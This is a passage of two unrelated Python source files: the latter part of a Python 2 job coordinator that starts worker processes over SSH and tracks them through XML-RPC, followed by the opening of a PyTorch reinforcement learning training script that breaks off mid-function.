DON'T START ANOTHER PROCESS, TOO MANY ALREADY try: if len(self.clients_starting[host])>=self.max_ssh_errors: print >>sys.stderr,\ 'start_client: blocked, too many unstarted jobs:',\ host,self.clients_starting[host] return # DON'T START ANOTHER PROCESS, host MAY BE DEAD... except KeyError: # NO clients_starting ON host, GOOD! pass try: if len(self.initialization_errors[host])>=self.max_initialization_errors: print >>sys.stderr,\ 'start_client: blocked, too many initialization errors:',\ host,self.initialization_errors[host] return # DON'T START ANOTHER PROCESS, host HAS A PROBLEM except KeyError: # NO initialization_errors ON host, GOOD! pass try: sshopts=self.hosts[host].sshopts # GET sshopts VIA XMLRPC except AttributeError: sshopts='' logfile=os.path.join(tempfile.gettempdir(), '%s_%d.log' % (self.name, self.iclient)) # PASS OUR KWARGS ON TO THE CLIENT PROCESSOR kwargs=' '.join(['--%s=%s'%(k,v) for k,v in self.kwargs.items()]) cmd='cd %s;%s %s --url=http://%s:%d --rc_url=%s --logfile=%s %s %s' \ % (self.dir,self.python,self.script,self.host,self.port, self.rc_url,logfile,self.name,kwargs) # UGH, HAVE TO MIX CSH REDIRECTION (REMOTE) WITH SH REDIRECTION (LOCAL) ssh_cmd="ssh %s %s '(%s) </dev/null >&%s &' </dev/null >>%s 2>&1 &" \ % (sshopts,host,cmd,logfile,self.errlog) print >>sys.stderr,'SSH: '+ssh_cmd self.logfile[logfile]=[host,False,self.iclient] # NO PID YET try: # RECORD THIS CLIENT AS STARTING UP self.clients_starting[host][self.iclient]=time.time() except KeyError: # CREATE A NEW HOST ENTRY self.clients_starting[host]={self.iclient:time.time()} # RUN SSH IN BACKGROUND TO AVOID WAITING FOR IT TO TIMEOUT!!! 
os.system(ssh_cmd) # LAUNCH THE SSH PROCESS, SHOULD RETURN IMMEDIATELY self.iclient += 1 # ADVANCE OUR CLIENT COUNTER def start_processors(self,hosts): "start processors on the list of hosts using SSH transport" for host in hosts: # LAUNCH OURSELVES AS PROCESSOR ON ALL THESE HOSTS self.start_client(host) return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def register(self): "register our existence with the resource controller" url='http://%s:%d' % (self.host,self.port) self.rc_server.register_coordinator(self.name,url,self.user, self.priority,self.resources, self.immediate,self.demand_ncpu) def unregister(self,message): "tell the resource controller we're exiting" url='http://%s:%d' % (self.host,self.port) self.rc_server.unregister_coordinator(self.name,url,message) def register_client(self,host,pid,logfile): 'XMLRPC call to register client hostname and PID as starting_up' print >>sys.stderr,'register_client: %s:%d' %(host,pid) self.clients[(host,pid)]=0 try: self.logfile[logfile][1]=pid # SAVE OUR PID iclient=self.logfile[logfile][2] # GET ITS CLIENT ID del self.clients_starting[host][iclient] #REMOVE FROM STARTUP LIST except KeyError: print >>sys.stderr,'no client logfile?',host,pid,logfile self.clients_initializing[(host,pid)]=logfile return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def unregister_client(self,host,pid,message): 'XMLRPC call to remove client from register as exiting' print >>sys.stderr,'unregister_client: %s:%d %s' % (host,pid,message) try: del self.clients[(host,pid)] except KeyError: print >>sys.stderr,'unregister_client: unknown client %s:%d' % (host,pid) try: # REMOVE IT FROM THE LIST OF CLIENTS TO SHUTDOWN, IF PRESENT del self.stop_clients[(host,pid)] except KeyError: pass try: # REMOVE FROM INITIALIZATION LIST del self.clients_initializing[(host,pid)] except KeyError: pass if len(self.clients)==0 and self.done: # NO MORE TASKS AND NO MORE CLIENTS self.exit("Done") # SO SERVER CAN EXIT return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def report_success(self,host,pid,success_id): 'mark task as successfully completed' print >>self.successfile,success_id # KEEP PERMANENT RECORD OF SUCCESS ID self.successfile.flush() self.nsuccess += 1 try: self.clients[(host,pid)] += 1 except KeyError: print >>sys.stderr,'report_success: unknown client %s:%d' % (host,pid) try: del self.pending[success_id] except KeyError: print >>sys.stderr,'report_success: unknown ID %s' % str(success_id) return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def report_error(self,host,pid,id,tb_report): "get traceback report from client as text" print >>sys.stderr,"TRACEBACK: %s:%s ID %s\n%s" % \ (host,str(pid),str(id),tb_report) if (host,pid) in self.clients_initializing: logfile=self.clients_initializing[(host,pid)] try: self.initialization_errors[host].append(logfile) except KeyError: self.initialization_errors[host]=[logfile] try: del self.pending[id] except KeyError: # NOT ASSOCIATED WITH AN ACTUAL TASK ID, SO DON'T RECORD if id is not None and id is not False: print >>sys.stderr,'report_error: unknown ID %s' % str(id) else: print >>self.errorfile,id # KEEP PERMANENT RECORD OF FAILURE ID self.nerrors+=1 self.errorfile.flush() return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def next(self,host,pid,success_id): 'return next ID from iterator to the XMLRPC caller' if (host,pid) not in self.clients: print >>sys.stderr,'next: unknown client %s:%d' % (host,pid) return False # HAND BACK "NO MORE FOR YOU TO DO" SIGNAL try: # INITIALIZATION DONE, SO REMOVE FROM INITIALIZATION LIST del 
self.clients_initializing[(host,pid)] except KeyError: pass if success_id is not False: self.report_success(host,pid,success_id) if self.done: # EXHAUSTED OUR ITERATOR, SO SHUT DOWN THIS CLIENT return False # HAND BACK "NO MORE FOR YOU TO DO" SIGNAL try: # CHECK LIST FOR COMMAND TO SHUT DOWN THIS CLIENT del self.stop_clients[(host,pid)] # IS IT IN stop_clients? return False # IF SO, HAND BACK "NO MORE FOR YOU TO DO" SIGNAL except KeyError: # DO ONE MORE CHECK: ARE WE OVER OUR MAX ALLOWED LOAD? if len(self.clients)>self.max_clients: # YES, BETTER THROTTLE DOWN print >>sys.stderr,'next: halting %s:too many processors (%d>%d)' \ % (host,len(self.clients),self.max_clients) return False # HAND BACK "NO MORE FOR YOU TO DO" SIGNAL for id in self.it: # GET AN ID WE CAN USE if str(id) not in self.already_done: self.n+=1 # GREAT, WE CAN USE THIS ID self.lastID=id self.pending[id]=(host,pid,time.time()) print >>sys.stderr,'giving id %s to %s:%d' %(str(id),host,pid) return id print >>sys.stderr,'exhausted all items from iterator!' self.done=True # EXHAUSTED OUR ITERATOR self.priority=0.0 # RELEASE OUR CLAIMS ON ANY FURTHER PROCESSOR ALLOCATION self.register() # AND INFORM THE RESOURCE CONTROLLER return False # False IS CONFORMABLE BY XMLRPC... def get_status(self): "return basic status info on number of jobs finished, client list etc." client_report=[client+(nsuccess,) for client,nsuccess in self.clients.items()] pending_report=[(k,)+v for k,v in self.pending.items()] return self.name,self.errlog,self.n,self.nsuccess,self.nerrors,client_report,\ pending_report,self.logfile def set_max_clients(self,n): "change the maximum number of clients we should have running" self.max_clients=int(n) # MAKE SURE n IS CONVERTABLE TO int return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def stop_client(self,host,pid): "set signal forcing this client to exit on next iteration" self.stop_clients[(host,pid)]=None return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def exit(self,message): "clean up and close this server" self.unregister(message) self.successfile.close() self.errorfile.close() sys.exit() try: class ResourceFile(file): """wrapper around some locking behavior, to ensure only one copy operation performed for a given resource on a given host. Otherwise, it's just a regular file object.""" def __init__(self,resource,rule,mode,processor): "resource is name of the resource; rule is (localFile,cpCommand)" self.resource=resource self.processor=processor localFile,cpCommand=rule if not os.access(localFile,os.R_OK): cmd=cpCommand % localFile print 'copying data:',cmd os.system(cmd) file.__init__(self,localFile,mode) # NOW INITIALIZE AS A REAL FILE OBJECT def close(self): self.processor.release_rule(self.resource) # RELEASE THE LOCK WE PLACED ON THIS RULE file.close(self) except TypeError: pass class Processor(object): 'provides an iterator interface to an XMLRPC ID server' max_errors_in_a_row=10 # LOOKS LIKE NOTHING WORKS HERE, SO QUIT! 
max_tb=10 # DON'T SHOW MORE THAN 10 STACK LEVELS FOR A TRACEBACK report_frequency=600 overload_max=5 # MAXIMUM NUMBER OF OVERLOAD EVENTS IN A ROW BEFORE WE EXIT def __init__(self,url="http://localhost:8888", rc_url='http://localhost:5000',logfile=False,**kwargs): self.url=url self.logfile=logfile self.server=xmlrpclib.ServerProxy(url) self.rc_url=rc_url self.rc_server=xmlrpclib.ServerProxy(rc_url) self.host=get_hostname() self.pid=os.getpid() self.user=os.environ['USER'] self.success_id=False self.pending_id=False self.exit_message='MYSTERY-EXIT please debug' self.overload_count=0 def register(self): "add ourselves to list of processors for this server" self.server.register_client(self.host,self.pid,self.logfile) self.rc_server.register_processor(self.host,self.pid,self.url) print >>sys.stderr,'REGISTERED:',self.url,self.rc_url def unregister(self,message): "remove ourselves from list of processors for this server" if self.success_id is not False: # REPORT THAT LAST JOB SUCCEEDED! self.report_success(self.success_id) self.server.unregister_client(self.host,self.pid,message) self.rc_server.unregister_processor(self.host,self.pid,self.url) print >>sys.stderr,'UNREGISTERED:',self.url,self.rc_url,message def __iter__(self): return self def next(self): "get next ID from server" # REPORT LAST JOB SUCCESSFULLY COMPLETED, IF ANY while 1: id=self.server.next(self.host,self.pid,self.success_id) self.success_id=False # ERASE SUCCESS ID if id is True: # WE'RE BEING TOLD TO JUST WAIT time.sleep(60) # SO GO TO SLEEP FOR A MINUTE else: break if id is False: # NO MODE id FOR US TO PROCESS, SO QUIT self.serverStopIteration=True # RECORD THIS AS GENUINE END EVENT raise StopIteration else: # HAND BACK THE id TO THE USER self.pending_id=id return id def report_success(self,id): "report successful completion of task ID" self.server.report_success(self.host,self.pid,id) def report_error(self,id): "report an error using traceback.print_exc()" import StringIO err_report=StringIO.StringIO() traceback.print_exc(self.max_tb,sys.stderr) #REPORT TB TO OUR LOG traceback.print_exc(self.max_tb,err_report) #REPORT TB TO SERVER self.server.report_error(self.host,self.pid,id,err_report.getvalue()) err_report.close() def report_load(self): "report system load" load=os.getloadavg()[0] # GET 1 MINUTE LOAD AVERAGE if self.rc_server.report_load(self.host,self.pid,load) is False: self.overload_count+=1 # ARE WE CONSISTENTLY OVERLOADED FOR EXTENDED PERIOD? if self.overload_count>self.overload_max: # IF EXCEEDED LIMIT, EXIT self.exit('load too high') else: self.overload_count=0 def open_resource(self,resource,mode): "get a file object for the requested resource, opened in mode" while 1: rule=self.rc_server.get_resource(self.host,self.pid,resource) if rule is False: # WE HAVE TO LOCK AND APPLY A RULE... rule=self.acquire_rule(resource) if rule is True: # HMM, LOOKS LIKE A RACE CONDITION. KEEP WAITING time.sleep(60) # WAIT A MINUTE BEFORE ASKING FOR RESOURCE AGAIN continue return ResourceFile(resource,rule,mode,self) #CONSTRUCT THE RESOURCE elif rule is True: # RULE IS LOCKED BY ANOTHER PROCESSOR time.sleep(60) # WAIT A MINUTE BEFORE ASKING FOR RESOURCE AGAIN else: # GOT A REGULAR FILE, SO JUST OPEN IT return file(rule,mode) def acquire_rule(self,resource): "lock the specified resource rule for this host, so it's safe to build it" rule=self.rc_server.acquire_rule(self.host,self.pid,resource) if rule is False: # NO SUCH RESOURCE?!? 
self.exit('invalid resource: '+resource) return rule def release_rule(self,resource): "release our lock on this resource rule, so others can use it" self.rc_server.release_rule(self.host,self.pid,resource) def exit(self,message): "save message for self.unregister() and force exit" self.exit_message=message raise SystemExit def run_all(self,resultGenerator,**kwargs): "run until all task IDs completed, trap & report all errors" errors_in_a_row=0 it=resultGenerator(self,**kwargs) # GET ITERATOR FROM GENERATOR report_time=time.time() self.register() # REGISTER WITH RESOURCE CONTROLLER & COORDINATOR initializationError=None try: # TRAP ERRORS BOTH IN USER CODE AND coordinator CODE while 1: try: # TRAP AND REPORT ALL ERRORS IN USER CODE id=it.next() # THIS RUNS USER CODE FOR ONE ITERATION self.success_id=id # MARK THIS AS A SUCCESS... errors_in_a_row=0 initializationError=False except StopIteration: # NO MORE TASKS FOR US... if not hasattr(self,'serverStopIteration'): # WIERD!! # USER CODE RAISED StopIteration?!? self.report_error(self.pending_id) # REPORT THE PROBLEM self.exit_message='user StopIteration error' elif initializationError: self.exit_message='initialization error' else: self.exit_message='done' break except SystemExit: # sys.exit() CALLED raise # WE REALLY DO WANT TO EXIT. except: # MUST HAVE BEEN AN ERROR IN THE USER CODE if initializationError is None: # STILL IN INITIALIZATION initializationError=True self.report_error(self.pending_id) # REPORT THE PROBLEM errors_in_a_row +=1 if errors_in_a_row>=self.max_errors_in_a_row: self.exit_message='too many errors' break if time.time()-report_time>self.report_frequency: self.report_load() # SEND A ROUTINE LOAD REPORT report_time=time.time() except SystemExit: # sys.exit() CALLED pass # WE REALLY DO WANT TO EXIT. except: # IMPORTANT TO TRAP ALL ERRORS SO THAT WE UNREGISTER!! traceback.print_exc(self.max_tb,sys.stderr) #REPORT TB TO OUR LOG self.exit_message='error trap' self.unregister('run_all '+self.exit_message) # MUST UNREGISTER!! def run_interactive(self,it,n=1,**kwargs): "run n task IDs, with no error trapping" if not hasattr(it,'next'): it=it(self,**kwargs) # ASSUME it IS GENERATOR, USE IT TO GET ITERATOR i=0 self.register() # REGISTER WITH RESOURCE CONTROLLER & COORDINATOR try: # EVEN IF ERROR OCCURS, WE MUST UNREGISTER!! for id in it: self.success_id=id i+=1 if i>=n: break except: self.unregister('run_interactive error') # MUST UNREGISTER!!! raise # SHOW THE ERROR INTERACTIVELY self.unregister('run_interactive exit') return it # HAND BACK ITERATOR IN CASE USER WANTS TO RUN MORE... def parse_argv(): "parse sys.argv into a dictionary of GNU-style args --foo=bar and list of other args" d={} l=[] for v in sys.argv[1:]: if v[:2]=='--': try: k,v=v[2:].split('=') d[k]=v except ValueError: d[v[2:]]=None else: l.append(v) return d,l def start_client_or_server(clientGenerator,serverGenerator,resources,script): """start controller, client or server depending on whether we get coordinator argument from the command-line args. Client must be a generator function that takes Processor as argument, and uses it as an iterator. Also, clientGenerator must yield the IDs that the Processor provides (this structure allows us to trap all exceptions from clientGenerator, while allowing it to do resource initializations that would be much less elegant in a callback function.) Server must be a function that returns an iterator (e.g. a generator). 
Resources is a list of strings naming the resources we need copied to local host for client to be able to do its work. Both client and server constructors use **kwargs to get command line arguments (passed as GNU-style --foo=bar; see the constructor arguments to see the list of options that each can be passed. #CALL LIKE THIS FROM yourscript.py: import coordinator if __name__=='__main__': coordinator.start_client_or_server(clientGen,serverGen,resources,__file__) To start the resource controller: python coordinator.py --rc=NAME [options] To start a job coordinator: python yourscript.py NAME [--rc_url=URL] [options] To start a job processor: python yourscript.py --url=URL --rc_url=URL [options]""" d,l=parse_argv() if 'url' in d: # WE ARE A CLIENT! client=Processor(**d) time.sleep(5) # GIVE THE SERVER SOME BREATHING SPACE client.run_all(clientGenerator,**d) elif 'rc' in d: # WE ARE THE RESOURCE CONTROLLER rc_server=ResourceController(**d) # NAME FOR THIS CONTROLLER... detach_as_demon_process(rc_server) rc_server() # START THE SERVER else: # WE ARE A SERVER try: # PASS OUR KWARGS TO THE SERVER FUNCTION it=serverGenerator(**d) except TypeError: # DOESN'T WANT ANY ARGS? it=serverGenerator() server=Coordinator(l[0],script,it,resources,**d) detach_as_demon_process(server) server() # START THE SERVER class CoordinatorMonitor(object): "Monitor a Coordinator." def __init__(self,coordInfo): self.name,self.url,self.priority,self.allocated_ncpu,self.ncpu,\ self.start_time=coordInfo self.server=xmlrpclib.ServerProxy(self.url) self.get_status() def get_status(self): self.name,self.errlog,self.n,self.nsuccess,self.nerrors,self.client_report,\ self.pending_report,self.logfile=self.server.get_status() print "Got status from Coordinator:",self.name,self.url def __getattr__(self,attr): "just pass on method requests to our server" return getattr(self.server,attr) class RCMonitor(object): """monitor a ResourceController. Useful methods: get_status() load_balance() setrule(rsrc,rule) delrule(rsrc) setload(host,maxload) retry_unused_hosts() Documented in ResourceController docstrings.""" def __init__(self,host=None,port=5000): host=get_hostname(host) # GET FQDN self.rc_url='http://%s:%d' %(host,port) self.rc_server=xmlrpclib.ServerProxy(self.rc_url) self.get_status() def get_status(self): self.name,self.errlog,self.systemLoad,self.hosts,coordinators, \ self.rules,self.resources,self.locks=self.rc_server.get_status() print "Got status from ResourceController:",self.name,self.rc_url self.coordinators={} for cinfo in coordinators: try: # IF COORDINATOR HAS DIED, STILL WANT TO RETURN RCMonitor... self.coordinators[cinfo[0]]=CoordinatorMonitor(cinfo) except socket.error,e: # JUST COMPLAIN, BUT CONTINUE... print >>sys.stderr,"Unable to connect to coordinator:",cinfo,e def __getattr__(self,attr): "just pass on method requests to our rc_server" return getattr(self.rc_server,attr) def test_client(server,**kwargs): for id in server: print 'ID',id yield id time.sleep(1) def test_server(): return range(1000) if __name__=='__main__': start_client_or_server(test_client,test_server,[],__file__)
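# --- Illustrative sketch (added; not part of the original coordinator module) ---
# A hypothetical yourscript.py wired up the way the start_client_or_server()
# docstring above describes. The names clientGen/serverGen, the sleep stand-in
# for real work, and the empty resource list are assumptions for illustration
# only; it assumes the module above is importable as "coordinator".
import time

import coordinator


def clientGen(processor, **kwargs):
    # iterate over task IDs handed out by the Coordinator; yield each ID back
    # so Processor.run_all() can record it as a success before fetching the next
    for task_id in processor:
        time.sleep(1)  # stand-in for real per-task work
        yield task_id


def serverGen(**kwargs):
    # the Coordinator only needs an iterable of task IDs
    return iter(range(100))


if __name__ == '__main__':
    coordinator.start_client_or_server(clientGen, serverGen, [], __file__)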
polybeast.py
# Copyright (c) Facebook, Inc. and its affiliates. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import argparse import collections import logging import os import signal import subprocess import threading import time import timeit import traceback os.environ["OMP_NUM_THREADS"] = "1" # Necessary for multithreading. import nest import torch from libtorchbeast import actorpool from torch import nn from torch.nn import functional as F from torchbeast.core import file_writer from torchbeast.core import vtrace # yapf: disable parser = argparse.ArgumentParser(description="PyTorch Scalable Agent") parser.add_argument("--pipes_basename", default="unix:/tmp/polybeast", help="Basename for the pipes for inter-process communication. " "Has to be of the type unix:/some/path.") parser.add_argument("--mode", default="train", choices=["train", "test", "test_render"], help="Training or test mode.") parser.add_argument("--xpid", default=None, help="Experiment id (default: None).") parser.add_argument("--start_servers", dest="start_servers", action="store_true", help="Spawn polybeast_env servers automatically.") parser.add_argument("--no_start_servers", dest="start_servers", action="store_false", help="Don't spawn polybeast_env servers automatically.") parser.set_defaults(start_servers=True) parser.add_argument("--env", type=str, default="PongNoFrameskip-v4", help="Gym environment. Ignored if --no_start_servers is passed.") # Training settings. parser.add_argument("--disable_checkpoint", action="store_true", help="Disable saving checkpoint.") parser.add_argument("--savedir", default="~/logs/torchbeast", help="Root dir where experiment data will be saved.") parser.add_argument("--num_actors", default=4, type=int, metavar="N", help="Number of actors.") parser.add_argument("--total_steps", default=100000, type=int, metavar="T", help="Total environment steps to train for.") parser.add_argument("--batch_size", default=8, type=int, metavar="B", help="Learner batch size.") parser.add_argument("--unroll_length", default=80, type=int, metavar="T", help="The unroll length (time dimension).") parser.add_argument("--num_learner_threads", default=2, type=int, metavar="N", help="Number learner threads.") parser.add_argument("--num_inference_threads", default=2, type=int, metavar="N", help="Number learner threads.") parser.add_argument("--disable_cuda", action="store_true", help="Disable CUDA.") parser.add_argument("--num_actions", default=6, type=int, metavar="A", help="Number of actions.") parser.add_argument("--use_lstm", action="store_true", help="Use LSTM in agent model.") parser.add_argument("--max_learner_queue_size", default=None, type=int, metavar="N", help="Optional maximum learner queue size. Defaults to batch_size.") # Loss settings. 
parser.add_argument("--entropy_cost", default=0.0006, type=float, help="Entropy cost/multiplier.") parser.add_argument("--baseline_cost", default=0.5, type=float, help="Baseline cost/multiplier.") parser.add_argument("--discounting", default=0.99, type=float, help="Discounting factor.") parser.add_argument("--reward_clipping", default="abs_one", choices=["abs_one", "none"], help="Reward clipping.") # Optimizer settings. parser.add_argument("--learning_rate", default=0.00048, type=float, metavar="LR", help="Learning rate.") parser.add_argument("--alpha", default=0.99, type=float, help="RMSProp smoothing constant.") parser.add_argument("--momentum", default=0, type=float, help="RMSProp momentum.") parser.add_argument("--epsilon", default=0.01, type=float, help="RMSProp epsilon.") parser.add_argument("--grad_norm_clipping", default=40.0, type=float, help="Global gradient norm clip.") # Misc settings. parser.add_argument("--write_profiler_trace", action="store_true", help="Collect and write a profiler trace " "for chrome://tracing/.") # yapf: enable logging.basicConfig( format=( "[%(levelname)s:%(process)d %(module)s:%(lineno)d %(asctime)s] " "%(message)s" ), level=0, ) def compute_baseline_loss(advantages): return 0.5 * torch.sum(advantages ** 2) def compute_entropy_loss(logits): """Return the entropy loss, i.e., the negative entropy of the policy.""" policy = F.softmax(logits, dim=-1) log_policy = F.log_softmax(logits, dim=-1) return torch.sum(policy * log_policy) def compute_policy_gradient_loss(logits, actions, advantages): cross_entropy = F.nll_loss( F.log_softmax(torch.flatten(logits, 0, 1), dim=-1), target=torch.flatten(actions, 0, 1), reduction="none", ) cross_entropy = cross_entropy.view_as(advantages) return torch.sum(cross_entropy * advantages.detach()) class Net(nn.Module): def __init__(self, num_actions, use_lstm=False): super(Net, self).__init__() self.num_actions = num_actions self.use_lstm = use_lstm self.feat_convs = [] self.resnet1 = [] self.resnet2 = [] self.convs = [] input_channels = 4 for num_ch in [16, 32, 32]: feats_convs = [] feats_convs.append( nn.Conv2d( in_channels=input_channels, out_channels=num_ch, kernel_size=3, stride=1, padding=1, ) ) feats_convs.append(nn.MaxPool2d(kernel_size=3, stride=2, padding=1)) self.feat_convs.append(nn.Sequential(*feats_convs)) input_channels = num_ch for i in range(2): resnet_block = [] resnet_block.append(nn.ReLU()) resnet_block.append( nn.Conv2d( in_channels=input_channels, out_channels=num_ch, kernel_size=3, stride=1, padding=1, ) ) resnet_block.append(nn.ReLU()) resnet_block.append( nn.Conv2d( in_channels=input_channels, out_channels=num_ch, kernel_size=3, stride=1, padding=1, ) ) if i == 0: self.resnet1.append(nn.Sequential(*resnet_block)) else: self.resnet2.append(nn.Sequential(*resnet_block)) self.feat_convs = nn.ModuleList(self.feat_convs) self.resnet1 = nn.ModuleList(self.resnet1) self.resnet2 = nn.ModuleList(self.resnet2) self.fc = nn.Linear(3872, 256) # FC output size + last reward. 
core_output_size = self.fc.out_features + 1 if use_lstm: self.core = nn.LSTM(core_output_size, 256, num_layers=1) core_output_size = 256 self.policy = nn.Linear(core_output_size, self.num_actions) self.baseline = nn.Linear(core_output_size, 1) def initial_state(self, batch_size=1): if not self.use_lstm: return tuple() return tuple( torch.zeros(self.core.num_layers, batch_size, self.core.hidden_size) for _ in range(2) ) def forward(self, inputs, core_state): x = inputs["frame"] T, B, *_ = x.shape x = torch.flatten(x, 0, 1) # Merge time and batch. x = x.float() / 255.0 res_input = None for i, fconv in enumerate(self.feat_convs): x = fconv(x) res_input = x x = self.resnet1[i](x) x += res_input res_input = x x = self.resnet2[i](x) x += res_input x = F.relu(x) x = x.view(T * B, -1) x = F.relu(self.fc(x)) clipped_reward = torch.clamp(inputs["reward"], -1, 1).view(T * B, 1) core_input = torch.cat([x, clipped_reward], dim=-1) if self.use_lstm: core_input = core_input.view(T, B, -1) core_output_list = [] notdone = (1 - inputs["done"]).float() for input, nd in zip(core_input.unbind(), notdone.unbind()): # Reset core state to zero whenever an episode ended. # Make `done` broadcastable with (num_layers, B, hidden_size) # states: nd = nd.view(1, -1, 1) core_state = nest.map(nd.mul, core_state) output, core_state = self.core(input.unsqueeze(0), core_state) core_output_list.append(output) core_output = torch.flatten(torch.cat(core_output_list), 0, 1) else: core_output = core_input policy_logits = self.policy(core_output) baseline = self.baseline(core_output) if self.training: action = torch.multinomial(F.softmax(policy_logits, dim=1), num_samples=1) else: # Don't sample when testing. action = torch.argmax(policy_logits, dim=1) policy_logits = policy_logits.view(T, B, self.num_actions) baseline = baseline.view(T, B) action = action.view(T, B) return (action, policy_logits, baseline), core_state def inference(flags, inference_batcher, model, lock=threading.Lock()): # noqa: B008 with torch.no_grad(): for batch in inference_batcher: batched_env_outputs, agent_state = batch.get_inputs() frame, reward, done, *_ = batched_env_outputs frame = frame.to(flags.actor_device, non_blocking=True) reward = reward.to(flags.actor_device, non_blocking=True) done = done.to(flags.actor_device, non_blocking=True) agent_state = nest.map( lambda t: t.to(flags.actor_device, non_blocking=True), agent_state ) with lock: outputs = model( dict(frame=frame, reward=reward, done=done), agent_state ) outputs = nest.map(lambda t: t.cpu(), outputs) batch.set_outputs(outputs) EnvOutput = collections.namedtuple( "EnvOutput", "frame rewards done episode_step episode_return" ) AgentOutput = collections.namedtuple("AgentOutput", "action policy_logits baseline") Batch = collections.namedtuple("Batch", "env agent") def learn( flags, learner_queue, model, actor_model, optimizer, scheduler, stats, plogger, lock=threading.Lock(), ): for tensors in learner_queue: tensors = nest.map(lambda t: t.to(flags.learner_device), tensors) batch, initial_agent_state = tensors env_outputs, actor_outputs = batch frame, reward, done, *_ = env_outputs lock.acquire() # Only one thread learning at a time. learner_outputs, unused_state = model( dict(frame=frame, reward=reward, done=done), initial_agent_state ) # Take final value function slice for bootstrapping. learner_outputs = AgentOutput._make(learner_outputs) bootstrap_value = learner_outputs.baseline[-1] # Move from obs[t] -> action[t] to action[t] -> obs[t]. 
batch = nest.map(lambda t: t[1:], batch) learner_outputs = nest.map(lambda t: t[:-1], learner_outputs) # Turn into namedtuples again. env_outputs, actor_outputs = batch env_outputs = EnvOutput._make(env_outputs) actor_outputs = AgentOutput._make(actor_outputs) learner_outputs = AgentOutput._make(learner_outputs) if flags.reward_clipping == "abs_one": clipped_rewards = torch.clamp(env_outputs.rewards, -1, 1) elif flags.reward_clipping == "none": clipped_rewards = env_outputs.rewards discounts = (1 - env_outputs.done).float() * flags.discounting vtrace_returns = vtrace.from_logits( behavior_policy_logits=actor_outputs.policy_logits, target_policy_logits=learner_outputs.policy_logits, actions=actor_outputs.action, discounts=discounts, rewards=clipped_rewards, values=learner_outputs.baseline, bootstrap_value=bootstrap_value, ) pg_loss = compute_policy_gradient_loss( learner_outputs.policy_logits, actor_outputs.action, vtrace_returns.pg_advantages, ) baseline_loss = flags.baseline_cost * compute_baseline_loss( vtrace_returns.vs - learner_outputs.baseline ) entropy_loss = flags.entropy_cost * compute_entropy_loss( learner_outputs.policy_logits ) total_loss = pg_loss + baseline_loss + entropy_loss scheduler.step() optimizer.zero_grad() total_loss.backward() nn.utils.clip_grad_norm_(model.parameters(), flags.grad_norm_clipping) optimizer.step() actor_model.load_state_dict(model.state_dict()) episode_returns = env_outputs.episode_return[env_outputs.done] stats["step"] = stats.get("step", 0) + flags.unroll_length * flags.batch_size stats["episode_returns"] = tuple(episode_returns.cpu().numpy()) stats["mean_episode_return"] = torch.mean(episode_returns).item() stats["mean_episode_step"] = torch.mean(env_outputs.episode_step.float()).item() stats["total_loss"] = total_loss.item() stats["pg_loss"] = pg_loss.item() stats["baseline_loss"] = baseline_loss.item() stats["entropy_loss"] = entropy_loss.item() stats["learner_queue_size"] = learner_queue.size() plogger.log(stats) if not len(episode_returns): # Hide the mean-of-empty-tuple NaN as it scares people. stats["mean_episode_return"] = None lock.release() def train(flags): if flags.xpid is None: flags.xpid = "torchbeast-%s" % time.strftime("%Y%m%d-%H%M%S") plogger = file_writer.FileWriter( xpid=flags.xpid, xp_args=flags.__dict__, rootdir=flags.savedir ) checkpointpath = os.path.expandvars( os.path.expanduser("%s/%s/%s" % (flags.savedir, flags.xpid, "model.tar")) ) if not flags.disable_cuda and torch.cuda.is_available(): logging.info("Using CUDA.") flags.learner_device = torch.device("cuda:0") flags.actor_device = torch.device("cuda:1") else: logging.info("Not using CUDA.") flags.learner_device = torch.device("cpu") flags.actor_device = torch.device("cpu") if flags.max_learner_queue_size is None: flags.max_learner_queue_size = flags.batch_size # The queue the learner threads will get their data from. # Setting `minimum_batch_size == maximum_batch_size` # makes the batch size static. learner_queue = actorpool.BatchingQueue( batch_dim=1, minimum_batch_size=flags.batch_size, maximum_batch_size=flags.batch_size, check_inputs=True, maximum_queue_size=flags.max_learner_queue_size, ) # The "batcher", a queue for the inference call. Will yield # "batch" objects with `get_inputs` and `set_outputs` methods. # The batch size of the tensors will be dynamic. 
inference_batcher = actorpool.DynamicBatcher( batch_dim=1, minimum_batch_size=1, maximum_batch_size=512, timeout_ms=100, check_outputs=True, ) addresses = [] connections_per_server = 1 pipe_id = 0 while len(addresses) < flags.num_actors: for _ in range(connections_per_server): addresses.append(f"{flags.pipes_basename}.{pipe_id}") if len(addresses) == flags.num_actors: break pipe_id += 1 model = Net(num_actions=flags.num_actions, use_lstm=flags.use_lstm) model = model.to(device=flags.learner_device) actor_model = Net(num_actions=flags.num_actions, use_lstm=flags.use_lstm) actor_model.to(device=flags.actor_device) # The ActorPool that will run `flags.num_actors` many loops. actors = actorpool.ActorPool( unroll_length=flags.unroll_length, learner_queue=learner_queue, inference_batcher=inference_batcher, env_server_addresses=addresses, initial_agent_state=actor_model.initial_state(), ) def run(): try: actors.run() except Exception as e: logging.error("Exception in actorpool thread!") traceback.print_exc() print() raise e actorpool_thread = threading.Thread(target=run, name="actorpool-thread") optimizer = torch.optim.RMSprop( model.parameters(), lr=flags.learning_rate, momentum=flags.momentum, eps=flags.epsilon, alpha=flags.alpha, ) def lr_lambda(epoch): return ( 1 - min(epoch * flags.unroll_length * flags.batch_size, flags.total_steps) / flags.total_steps ) scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda) stats = {} # Load state from a checkpoint, if possible. if os.path.exists(checkpointpath): checkpoint_states = torch.load( checkpointpath, map_location=flags.learner_device ) model.load_state_dict(checkpoint_states["model_state_dict"]) optimizer.load_state_dict(checkpoint_states["optimizer_state_dict"]) scheduler.load_state_dict(checkpoint_states["scheduler_state_dict"]) stats = checkpoint_states["stats"] logging.info(f"Resuming preempted job, current stats:\n{stats}") # Initialize actor model like learner model. actor_model.load_state_dict(model.state_dict()) learner_threads = [ threading.Thread( target=learn, 